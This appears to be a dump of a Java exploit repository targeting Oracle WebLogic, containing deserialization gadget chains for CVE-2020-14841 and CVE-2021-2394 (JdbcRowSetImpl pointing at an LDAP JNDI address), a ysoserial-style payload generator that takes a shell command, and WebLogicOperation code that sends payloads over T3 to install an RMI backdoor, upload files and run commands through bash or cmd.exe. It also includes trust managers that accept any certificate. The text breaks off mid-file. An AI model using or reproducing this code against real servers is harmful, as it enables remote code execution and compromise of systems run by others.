-------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jakarta.xml.bind-api-2.3.2.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/javassist-3.25.0-GA.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/javassist-3.25.0-GA.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jersey-client-2.30.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jersey-client-2.30.1.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jersey-common-2.30.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jersey-common-2.30.1.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jersey-entity-filtering-2.30.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jersey-entity-filtering-2.30.1.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jersey-hk2-2.30.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jersey-hk2-2.30.1.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jersey-media-jaxb-2.30.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jersey-media-jaxb-2.30.1.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jersey-media-json-jackson-2.30.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jersey-media-json-jackson-2.30.1.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jersey-server-2.30.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jersey-server-2.30.1.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/osgi-resource-locator-1.0.3.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/osgi-resource-locator-1.0.3.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/toplink-grid.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/toplink-grid.jar -------------------------------------------------------------------------------- /weblogic/lib/weblogic/coherence.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/coherence.jar -------------------------------------------------------------------------------- /weblogic/lib/weblogic/commons-cli-1.4.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/commons-cli-1.4.jar -------------------------------------------------------------------------------- /weblogic/lib/weblogic/commons-codec-1.15.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/commons-codec-1.15.jar -------------------------------------------------------------------------------- /weblogic/lib/weblogic/commons-collections-3.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/commons-collections-3.1.jar -------------------------------------------------------------------------------- /weblogic/lib/weblogic/commons-httpclient-3.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/commons-httpclient-3.1.jar -------------------------------------------------------------------------------- /weblogic/lib/weblogic/commons-io-2.7.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/commons-io-2.7.jar -------------------------------------------------------------------------------- /weblogic/lib/weblogic/commons-logging-1.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/commons-logging-1.2.jar -------------------------------------------------------------------------------- /weblogic/lib/weblogic/jsafeFIPS.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/jsafeFIPS.jar -------------------------------------------------------------------------------- /weblogic/lib/weblogic/wlcipher.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/wlcipher.jar -------------------------------------------------------------------------------- /weblogic/lib/weblogic/wlfullclient.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/wlfullclient.jar -------------------------------------------------------------------------------- /weblogic/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | JavaVulnSummary 7 | com.r17a 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | weblogic 13 | 14 | 15 | 16 | org.apache.maven.plugins 17 | maven-compiler-plugin 18 | 19 | 6 20 | 6 21 | 22 | 23 | 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /weblogic/src/main/java/com/r17a/weblogic/Main.java: -------------------------------------------------------------------------------- 1 | package com.r17a.weblogic; 2 | 3 | import com.r17a.weblogic.cve.ObjectPayload; 4 | 5 | public class Main { 6 | private static final int INTERNAL_ERROR_CODE = 70; 7 | private static final int USAGE_CODE = 64; 8 | 9 | public static void main(final String[] args) { 10 | if (args.length != 2) { 11 | printUsage(); 12 | System.exit(USAGE_CODE); 13 | } 14 | final String cveId = args[0]; 15 | final String cmd = args[1]; 16 | // String cveId = "CVE-2021-2135"; 17 | // String cmd = "calc"; 18 | 19 | try { 20 | String className = "weblogic.cve." + cveIdDeal(cveId); 21 | final Class clazz = (Class) Class.forName(className); 22 | ObjectPayload o = clazz.newInstance(); 23 | o.getSerFile(cmd); 24 | }catch (Exception e){ 25 | System.out.println(e); 26 | } 27 | } 28 | 29 | private static String cveIdDeal(String cveId){ 30 | if (cveId.contains("-")) { 31 | // 替换-为_,CVE-2020-2555->CVE_2020_2555 32 | cveId = cveId.replace("-","_"); 33 | } 34 | cveId = cveId.toUpperCase(); 35 | return cveId; 36 | } 37 | 38 | private static void printUsage() { 39 | System.err.println("Y SO SERIAL?"); 40 | System.err.println("Usage: java -jar ysoserial-[version]-all.jar [cveid] '[command]'"); 41 | System.err.println("eg: java -jar ysoserial-[version]-all.jar 'CVE-2021-2135' 'calc'"); 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /weblogic/src/main/java/com/r17a/weblogic/cve/CVE_2020_14841.java: -------------------------------------------------------------------------------- 1 | package com.r17a.weblogic.cve; 2 | 3 | import com.sun.rowset.JdbcRowSetImpl; 4 | import com.tangosol.util.comparator.ExtractorComparator; 5 | import oracle.eclipselink.coherence.integrated.internal.cache.LockVersionExtractor; 6 | import org.eclipse.persistence.internal.descriptors.MethodAttributeAccessor; 7 | 8 | import java.io.*; 9 | import java.lang.reflect.Field; 10 | import java.util.PriorityQueue; 11 | 12 | public class CVE_2020_14841 { 13 | public static void main(String[] args) throws Exception { 14 | // JdbcRowSetImpl 15 | JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl(); 16 | jdbcRowSet.setDataSourceName("ldap://127.0.0.1:1389/cn=foo,dc=example,dc=com"); 17 | 18 | MethodAttributeAccessor methodAttributeAccessor = new MethodAttributeAccessor(); 19 | methodAttributeAccessor.setGetMethodName("getDatabaseMetaData"); 20 | methodAttributeAccessor.setIsWriteOnly(true); 21 | methodAttributeAccessor.setAttributeName("xxx"); 22 | 23 | LockVersionExtractor extractor = new LockVersionExtractor(methodAttributeAccessor, "xxx"); 24 | 25 | ExtractorComparator comparator = new ExtractorComparator(extractor); 26 | PriorityQueue queue = new PriorityQueue(2, comparator); 27 | 28 | 29 | Object[] q = new Object[]{jdbcRowSet, 1}; 30 | Field queueField = queue.getClass().getDeclaredField("queue"); 31 | queueField.setAccessible(true); 32 | queueField.set(queue, q); 33 | Field sizeField = queue.getClass().getDeclaredField("size"); 34 | sizeField.setAccessible(true); 35 | sizeField.set(queue, 2); 36 | 37 | FileOutputStream fileOutputStream = new FileOutputStream(new File("E:\\test.ser")); 38 | ObjectOutputStream objectOutputStream = new ObjectOutputStream(fileOutputStream); 39 | objectOutputStream.writeObject(queue); 40 | 41 | FileInputStream fileInputStream = new FileInputStream(new File("E:\\test.ser")); 42 | ObjectInputStream objectInputStream = new ObjectInputStream(fileInputStream); 43 | objectInputStream.readObject(); 44 | } 45 | } 46 | -------------------------------------------------------------------------------- /weblogic/src/main/java/com/r17a/weblogic/cve/CVE_2021_2394.java: -------------------------------------------------------------------------------- 1 | package com.r17a.weblogic.cve; 2 | 3 | 4 | import com.sun.rowset.JdbcRowSetImpl; 5 | import com.tangosol.coherence.rest.util.extractor.MvelExtractor; 6 | import com.tangosol.coherence.servlet.AttributeHolder; 7 | import com.tangosol.util.aggregator.TopNAggregator; 8 | import oracle.eclipselink.coherence.integrated.internal.querying.FilterExtractor; 9 | import org.eclipse.persistence.internal.descriptors.MethodAttributeAccessor; 10 | 11 | import java.io.*; 12 | import java.lang.reflect.Field; 13 | import java.lang.reflect.Method; 14 | 15 | public class CVE_2021_2394 { 16 | public static void main(String[] args) { 17 | try{ 18 | JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl(); 19 | jdbcRowSet.setDataSourceName("ldap://127.0.0.1:1389/cn=foo,dc=example,dc=com"); 20 | 21 | // jdbcRowSet.getDatabaseMetaData间接调用lookup 22 | MethodAttributeAccessor methodAttributeAccessor = new MethodAttributeAccessor(); 23 | methodAttributeAccessor.setGetMethodName("connect"); 24 | methodAttributeAccessor.setSetMethodName("setConnection"); 25 | methodAttributeAccessor.setAttributeName("xxx"); 26 | 27 | FilterExtractor filterExtractor = new FilterExtractor(); 28 | filterExtractor.setAccessor(methodAttributeAccessor); 29 | 30 | MvelExtractor mvelExtractor = new MvelExtractor(""); 31 | 32 | TopNAggregator.PartialResult sortedBag = new TopNAggregator.PartialResult(mvelExtractor, 2); 33 | AttributeHolder attributeHolder = new AttributeHolder(); 34 | sortedBag.add(jdbcRowSet); 35 | 36 | Field m_comparator = sortedBag.getClass().getSuperclass().getDeclaredField("m_comparator"); 37 | m_comparator.setAccessible(true); 38 | m_comparator.set(sortedBag, filterExtractor); 39 | 40 | Method setInternalValue = attributeHolder.getClass().getDeclaredMethod("setInternalValue", Object.class); 41 | setInternalValue.setAccessible(true); 42 | setInternalValue.invoke(attributeHolder, sortedBag); 43 | 44 | FileOutputStream fileOutputStream = new FileOutputStream(new File("E:\\test.ser")); 45 | ObjectOutputStream objectOutputStream = new ObjectOutputStream(fileOutputStream); 46 | objectOutputStream.writeObject(attributeHolder); 47 | 48 | FileInputStream fileInputStream = new FileInputStream(new File("E:\\test.ser")); 49 | ObjectInputStream objectInputStream = new ObjectInputStream(fileInputStream); 50 | objectInputStream.readObject(); 51 | }catch (Exception e){ 52 | e.printStackTrace(); 53 | } 54 | 55 | } 56 | } 57 | -------------------------------------------------------------------------------- /weblogic/src/main/java/com/r17a/weblogic/cve/ObjectPayload.java: -------------------------------------------------------------------------------- 1 | package com.r17a.weblogic.cve; 2 | 3 | public interface ObjectPayload { 4 | void getSerFile(String cmd); 5 | } 6 | -------------------------------------------------------------------------------- /weblogic/src/main/java/com/r17a/weblogic/supeream/payload/PayloadTest.java: -------------------------------------------------------------------------------- 1 | package com.r17a.weblogic.supeream.payload; 2 | 3 | import com.r17a.weblogic.supeream.serial.BytesOperation; 4 | 5 | /** 6 | * Created by nike on 17/7/3. 7 | */ 8 | public class PayloadTest { 9 | public static void main(String[] args) throws Exception { 10 | // byte[] iRemoteCode = BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/out/production/weblogic_cmd/com/com.supeream/payload/IRemote.class"); 11 | // System.out.println(BytesOperation.bytesToHexString(iRemoteCode)); 12 | //DefiningClassLoader definingClassLoader = new DefiningClassLoader(); 13 | // Class cls = definingClassLoader.defineClass("com.com.supeream.payload.IRemote",iRemoteCode); 14 | byte[] remoteCodeImpl = BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/out/production/weblogic_cmd/com/com.supeream/payload/RemoteImpl.class"); 15 | System.out.println(BytesOperation.bytesToHexString(remoteCodeImpl)); 16 | 17 | // Class cls_ = definingClassLoader.defineClass("com.com.supeream.payload.RemoteImpl", remoteCodeImpl); 18 | Class.forName("com.supeream.payload.RemoteImpl"); 19 | // System.out.println(cls_); 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /weblogic/src/main/java/com/r17a/weblogic/supeream/serial/BytesOperation.java: -------------------------------------------------------------------------------- 1 | package com.r17a.weblogic.supeream.serial; 2 | 3 | // 4 | // Source code recreated from a .class file by IntelliJ IDEA 5 | // (powered by Fernflower decompiler) 6 | // 7 | 8 | import java.io.FileInputStream; 9 | 10 | public class BytesOperation { 11 | 12 | 13 | public static byte[] hexStringToBytes(String hexString) { 14 | if (hexString != null && !hexString.equals("")) { 15 | hexString = hexString.toUpperCase(); 16 | int length = hexString.length() / 2; 17 | char[] hexChars = hexString.toCharArray(); 18 | byte[] d = new byte[length]; 19 | 20 | for (int i = 0; i < length; ++i) { 21 | int pos = i * 2; 22 | d[i] = (byte) (charToByte(hexChars[pos]) << 4 | charToByte(hexChars[pos + 1])); 23 | } 24 | 25 | return d; 26 | } else { 27 | return null; 28 | } 29 | } 30 | 31 | private static byte charToByte(char c) { 32 | return (byte) "0123456789ABCDEF".indexOf(c); 33 | } 34 | 35 | public static byte[] byteMerger(byte[] byte_1, byte[] byte_2) { 36 | byte[] byte_3 = new byte[byte_1.length + byte_2.length]; 37 | System.arraycopy(byte_1, 0, byte_3, 0, byte_1.length); 38 | System.arraycopy(byte_2, 0, byte_3, byte_1.length, byte_2.length); 39 | return byte_3; 40 | } 41 | 42 | public static String bytesToHexString(byte[] src) { 43 | StringBuilder stringBuilder = new StringBuilder(""); 44 | if (src == null || src.length <= 0) { 45 | return null; 46 | } 47 | for (int i = 0; i < src.length; i++) { 48 | int v = src[i] & 0xFF; 49 | String hv = Integer.toHexString(v); 50 | if (hv.length() < 2) { 51 | stringBuilder.append(0); 52 | } 53 | stringBuilder.append(hv); 54 | } 55 | return stringBuilder.toString(); 56 | } 57 | 58 | public static byte[] GetByteByFile(String FilePath) throws Exception { 59 | FileInputStream fi = new FileInputStream(FilePath); 60 | byte[] temp = new byte[50000000]; 61 | int length = fi.read(temp); 62 | byte[] file = new byte[length]; 63 | 64 | for (int i = 0; i < length; ++i) { 65 | file[i] = temp[i]; 66 | } 67 | 68 | fi.close(); 69 | return file; 70 | } 71 | 72 | public static void main(String[] args) throws Exception { 73 | System.out.println(BytesOperation.bytesToHexString(BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/lib/remote.jar"))); 74 | } 75 | } 76 | -------------------------------------------------------------------------------- /weblogic/src/main/java/com/r17a/weblogic/supeream/serial/Reflections.java: -------------------------------------------------------------------------------- 1 | package com.r17a.weblogic.supeream.serial; 2 | 3 | import java.lang.reflect.Constructor; 4 | import java.lang.reflect.Field; 5 | 6 | public class Reflections { 7 | 8 | public static Field getField(final Class clazz, final String fieldName) throws Exception { 9 | Field field = clazz.getDeclaredField(fieldName); 10 | if (field == null && clazz.getSuperclass() != null) { 11 | field = getField(clazz.getSuperclass(), fieldName); 12 | } 13 | field.setAccessible(true); 14 | return field; 15 | } 16 | 17 | public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception { 18 | final Field field = getField(obj.getClass(), fieldName); 19 | field.set(obj, value); 20 | } 21 | 22 | public static Object getFieldValue(final Object obj, final String fieldName) throws Exception { 23 | final Field field = getField(obj.getClass(), fieldName); 24 | return field.get(obj); 25 | } 26 | 27 | public static Constructor getFirstCtor(final String name) throws Exception { 28 | final Constructor ctor = Class.forName(name).getDeclaredConstructors()[0]; 29 | ctor.setAccessible(true); 30 | return ctor; 31 | } 32 | 33 | } 34 | -------------------------------------------------------------------------------- /weblogic/src/main/java/com/r17a/weblogic/supeream/serial/Serializables.java: -------------------------------------------------------------------------------- 1 | package com.r17a.weblogic.supeream.serial; 2 | 3 | import java.io.*; 4 | 5 | public class Serializables { 6 | 7 | public static byte[] serialize(final Object obj) throws IOException { 8 | final ByteArrayOutputStream out = new ByteArrayOutputStream(); 9 | serialize(obj, out); 10 | return out.toByteArray(); 11 | } 12 | 13 | public static void serialize(final Object obj, final OutputStream out) throws IOException { 14 | final ObjectOutputStream objOut = new ObjectOutputStream(out); 15 | objOut.writeObject(obj); 16 | objOut.flush(); 17 | objOut.close(); 18 | } 19 | 20 | public static Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException { 21 | final ByteArrayInputStream in = new ByteArrayInputStream(serialized); 22 | return deserialize(in); 23 | } 24 | 25 | public static Object deserialize(final InputStream in) throws ClassNotFoundException, IOException { 26 | final ObjectInputStream objIn = new ObjectInputStream(in); 27 | return objIn.readObject(); 28 | } 29 | 30 | } -------------------------------------------------------------------------------- /weblogic/src/main/java/com/r17a/weblogic/supeream/ssl/SocketFactory.java: -------------------------------------------------------------------------------- 1 | package com.r17a.weblogic.supeream.ssl; 2 | 3 | import com.supeream.Main; 4 | 5 | import javax.net.ssl.SSLContext; 6 | import javax.net.ssl.SSLSocketFactory; 7 | import javax.net.ssl.TrustManager; 8 | import java.net.Socket; 9 | import java.security.SecureRandom; 10 | 11 | /** 12 | * Created by nike on 17/6/29. 13 | */ 14 | public class SocketFactory { 15 | private SocketFactory() { 16 | } 17 | 18 | public static Socket newSocket(String host, int port) throws Exception { 19 | Socket socket = null; 20 | try{ 21 | if (Main.cmdLine.hasOption("https")) { 22 | SSLContext context = SSLContext.getInstance("SSL"); 23 | // 初始化 24 | context.init(null, 25 | new TrustManager[]{new TrustManagerImpl()}, 26 | new SecureRandom()); 27 | SSLSocketFactory factory = context.getSocketFactory(); 28 | socket = factory.createSocket(host, port); 29 | } 30 | }catch (Exception e){ 31 | socket = new Socket(host, port); 32 | } 33 | 34 | return socket; 35 | } 36 | } 37 | -------------------------------------------------------------------------------- /weblogic/src/main/java/com/r17a/weblogic/supeream/ssl/TrustManagerImpl.java: -------------------------------------------------------------------------------- 1 | package com.r17a.weblogic.supeream.ssl; 2 | 3 | import javax.net.ssl.X509TrustManager; 4 | import java.security.cert.CertificateException; 5 | import java.security.cert.X509Certificate; 6 | 7 | /** 8 | * Created by nike on 17/6/29. 9 | */ 10 | public class TrustManagerImpl implements X509TrustManager { 11 | 12 | @Override 13 | public void checkClientTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException { 14 | } 15 | 16 | @Override 17 | public void checkServerTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException { 18 | 19 | } 20 | 21 | @Override 22 | public X509Certificate[] getAcceptedIssuers() { 23 | return null; 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /weblogic/src/main/java/com/r17a/weblogic/supeream/ssl/WeblogicTrustManager.java: -------------------------------------------------------------------------------- 1 | package com.r17a.weblogic.supeream.ssl; 2 | 3 | import weblogic.security.SSL.TrustManager; 4 | 5 | import java.security.cert.X509Certificate; 6 | 7 | /** 8 | * Created by nike on 17/6/29. 9 | */ 10 | public class WeblogicTrustManager implements TrustManager { 11 | @Override 12 | public boolean certificateCallback(X509Certificate[] x509Certificates, int i) { 13 | return true; 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /weblogic/src/main/java/com/r17a/weblogic/supeream/weblogic/BypassPayloadSelector.java: -------------------------------------------------------------------------------- 1 | package com.r17a.weblogic.supeream.weblogic; 2 | 3 | import com.supeream.Main; 4 | import com.supeream.serial.Serializables; 5 | import weblogic.corba.utils.MarshalledObject; 6 | import weblogic.jms.common.StreamMessageImpl; 7 | 8 | import java.io.IOException; 9 | 10 | /** 11 | * Created by nike on 17/6/26. 12 | */ 13 | public class BypassPayloadSelector { 14 | 15 | private static Object marshalledObject(Object payload) { 16 | MarshalledObject marshalledObject = null; 17 | try { 18 | marshalledObject = new MarshalledObject(payload); 19 | } catch (IOException e) { 20 | e.printStackTrace(); 21 | } 22 | return marshalledObject; 23 | } 24 | 25 | 26 | public static Object streamMessageImpl(byte[] object) throws Exception { 27 | 28 | StreamMessageImpl streamMessage = new StreamMessageImpl(); 29 | streamMessage.setDataBuffer(object, object.length); 30 | return streamMessage; 31 | } 32 | 33 | public static Object selectBypass(Object payload) throws Exception { 34 | 35 | if (Main.TYPE.equalsIgnoreCase("marshall")) { 36 | payload = marshalledObject(payload); 37 | } else if (Main.TYPE.equalsIgnoreCase("streamMessageImpl")) { 38 | payload = streamMessageImpl(Serializables.serialize(payload)); 39 | } 40 | return payload; 41 | } 42 | 43 | 44 | } 45 | -------------------------------------------------------------------------------- /weblogic/src/main/java/com/r17a/weblogic/supeream/weblogic/ObjectTest.java: -------------------------------------------------------------------------------- 1 | package com.r17a.weblogic.supeream.weblogic; 2 | 3 | import com.supeream.serial.BytesOperation; 4 | 5 | import java.io.ByteArrayInputStream; 6 | import java.io.ByteArrayOutputStream; 7 | import java.io.ObjectInputStream; 8 | import java.io.ObjectOutputStream; 9 | 10 | /** 11 | * Created by nike on 17/7/11. 12 | */ 13 | public class ObjectTest { 14 | public static void main(String[] args) throws Exception { 15 | 16 | 17 | ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); 18 | ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream); 19 | objectOutputStream.writeUTF("xxx"); 20 | String xx = BytesOperation.bytesToHexString(byteArrayOutputStream.toByteArray()); 21 | System.out.println(xx); 22 | byte[] cons = BytesOperation.hexStringToBytes(xx); 23 | 24 | 25 | 26 | ByteArrayInputStream bis = new ByteArrayInputStream(cons); 27 | ObjectInputStream objectInputStream = new ObjectInputStream(bis); 28 | objectInputStream.readObject(); 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /weblogic/src/main/java/com/r17a/weblogic/supeream/weblogic/WebLogicOperation.java: -------------------------------------------------------------------------------- 1 | package com.r17a.weblogic.supeream.weblogic; 2 | 3 | // 4 | // Source code recreated from a .class file by IntelliJ IDEA 5 | // (powered by Fernflower decompiler) 6 | // 7 | 8 | import com.supeream.Main; 9 | import com.supeream.serial.SerialDataGenerator; 10 | 11 | public class WebLogicOperation { 12 | 13 | public static void installRmi(String host, String port) throws Exception { 14 | byte[] payload = SerialDataGenerator.serialRmiDatas(new String[]{"install"}); 15 | T3ProtocolOperation.send(host, port, payload); 16 | } 17 | 18 | public static void unInstallRmi(String host, String port) throws Exception { 19 | byte[] payload = SerialDataGenerator.serialRmiDatas(new String[]{"uninstall"}); 20 | T3ProtocolOperation.send(host, port, payload); 21 | } 22 | 23 | public static void blind(String host, String port) throws Exception { 24 | byte[] payload = SerialDataGenerator.serialRmiDatas(new String[]{"blind", Main.cmdLine.getOptionValue("C")}); 25 | T3ProtocolOperation.send(host, port, payload); 26 | } 27 | 28 | public static void uploadFile(String host, String port, String filePath, byte[] content) throws Exception { 29 | byte[] payload = SerialDataGenerator.serialUploadDatas(filePath, content); 30 | T3ProtocolOperation.send(host, port, payload); 31 | } 32 | 33 | public static void blindExecute(String host, String port, String cmd) throws Exception { 34 | String[] cmds = new String[]{cmd}; 35 | if (Main.cmdLine.hasOption("os")) { 36 | if (Main.cmdLine.getOptionValue("os").equalsIgnoreCase("linux")) { 37 | cmds = new String[]{"/bin/bash", "-c", cmd}; 38 | } else { 39 | cmds = new String[]{"cmd.exe", "/c", cmd}; 40 | } 41 | } 42 | byte[] payload = SerialDataGenerator.serialBlindDatas(cmds); 43 | T3ProtocolOperation.send(host, port, payload); 44 | } 45 | 46 | } 47 | -------------------------------------------------------------------------------- /weblogic/src/main/java/com/supeream/payload/PayloadTest.java: -------------------------------------------------------------------------------- 1 | package com.supeream.payload; 2 | 3 | import com.supeream.serial.BytesOperation; 4 | 5 | /** 6 | * Created by nike on 17/7/3. 7 | */ 8 | public class PayloadTest { 9 | public static void main(String[] args) throws Exception { 10 | // byte[] iRemoteCode = BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/out/production/weblogic_cmd/com/com.supeream/payload/IRemote.class"); 11 | // System.out.println(BytesOperation.bytesToHexString(iRemoteCode)); 12 | //DefiningClassLoader definingClassLoader = new DefiningClassLoader(); 13 | // Class cls = definingClassLoader.defineClass("com.com.supeream.payload.IRemote",iRemoteCode); 14 | byte[] remoteCodeImpl = BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/out/production/weblogic_cmd/com/com.supeream/payload/RemoteImpl.class"); 15 | System.out.println(BytesOperation.bytesToHexString(remoteCodeImpl)); 16 | 17 | // Class cls_ = definingClassLoader.defineClass("com.com.supeream.payload.RemoteImpl", remoteCodeImpl); 18 | Class.forName("com.supeream.payload.RemoteImpl"); 19 | // System.out.println(cls_); 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /weblogic/src/main/java/com/supeream/serial/BytesOperation.java: -------------------------------------------------------------------------------- 1 | package com.supeream.serial; 2 | 3 | // 4 | // Source code recreated from a .class file by IntelliJ IDEA 5 | // (powered by Fernflower decompiler) 6 | // 7 | 8 | import java.io.FileInputStream; 9 | 10 | public class BytesOperation { 11 | 12 | 13 | public static byte[] hexStringToBytes(String hexString) { 14 | if (hexString != null && !hexString.equals("")) { 15 | hexString = hexString.toUpperCase(); 16 | int length = hexString.length() / 2; 17 | char[] hexChars = hexString.toCharArray(); 18 | byte[] d = new byte[length]; 19 | 20 | for (int i = 0; i < length; ++i) { 21 | int pos = i * 2; 22 | d[i] = (byte) (charToByte(hexChars[pos]) << 4 | charToByte(hexChars[pos + 1])); 23 | } 24 | 25 | return d; 26 | } else { 27 | return null; 28 | } 29 | } 30 | 31 | private static byte charToByte(char c) { 32 | return (byte) "0123456789ABCDEF".indexOf(c); 33 | } 34 | 35 | public static byte[] byteMerger(byte[] byte_1, byte[] byte_2) { 36 | byte[] byte_3 = new byte[byte_1.length + byte_2.length]; 37 | System.arraycopy(byte_1, 0, byte_3, 0, byte_1.length); 38 | System.arraycopy(byte_2, 0, byte_3, byte_1.length, byte_2.length); 39 | return byte_3; 40 | } 41 | 42 | public static String bytesToHexString(byte[] src) { 43 | StringBuilder stringBuilder = new StringBuilder(""); 44 | if (src == null || src.length <= 0) { 45 | return null; 46 | } 47 | for (int i = 0; i < src.length; i++) { 48 | int v = src[i] & 0xFF; 49 | String hv = Integer.toHexString(v); 50 | if (hv.length() < 2) { 51 | stringBuilder.append(0); 52 | } 53 | stringBuilder.append(hv); 54 | } 55 | return stringBuilder.toString(); 56 | } 57 | 58 | public static byte[] GetByteByFile(String FilePath) throws Exception { 59 | FileInputStream fi = new FileInputStream(FilePath); 60 | byte[] temp = new byte[50000000]; 61 | int length = fi.read(temp); 62 | byte[] file = new byte[length]; 63 | 64 | for (int i = 0; i < length; ++i) { 65 | file[i] = temp[i]; 66 | } 67 | 68 | fi.close(); 69 | return file; 70 | } 71 | 72 | public static void main(String[] args) throws Exception { 73 | System.out.println(BytesOperation.bytesToHexString(BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/lib/remote.jar"))); 74 | } 75 | } 76 | -------------------------------------------------------------------------------- /weblogic/src/main/java/com/supeream/serial/Reflections.java: -------------------------------------------------------------------------------- 1 | package com.supeream.serial; 2 | 3 | import java.lang.reflect.Constructor; 4 | import java.lang.reflect.Field; 5 | 6 | public class Reflections { 7 | 8 | public static Field getField(final Class clazz, final String fieldName) throws Exception { 9 | Field field = clazz.getDeclaredField(fieldName); 10 | if (field == null && clazz.getSuperclass() != null) { 11 | field = getField(clazz.getSuperclass(), fieldName); 12 | } 13 | field.setAccessible(true); 14 | return field; 15 | } 16 | 17 | public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception { 18 | final Field field = getField(obj.getClass(), fieldName); 19 | field.set(obj, value); 20 | } 21 | 22 | public static Object getFieldValue(final Object obj, final String fieldName) throws Exception { 23 | final Field field = getField(obj.getClass(), fieldName); 24 | return field.get(obj); 25 | } 26 | 27 | public static Constructor getFirstCtor(final String name) throws Exception { 28 | final Constructor ctor = Class.forName(name).getDeclaredConstructors()[0]; 29 | ctor.setAccessible(true); 30 | return ctor; 31 | } 32 | 33 | } 34 | -------------------------------------------------------------------------------- /weblogic/src/main/java/com/supeream/serial/Serializables.java: -------------------------------------------------------------------------------- 1 | package com.supeream.serial; 2 